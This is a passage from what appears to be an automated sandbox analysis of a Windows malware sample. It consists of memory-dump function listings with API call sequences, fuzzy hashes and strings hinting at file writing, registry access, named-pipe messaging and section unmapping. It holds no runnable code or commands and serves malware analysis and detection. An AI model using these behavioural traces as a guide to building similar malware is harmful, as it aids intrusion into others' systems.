    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
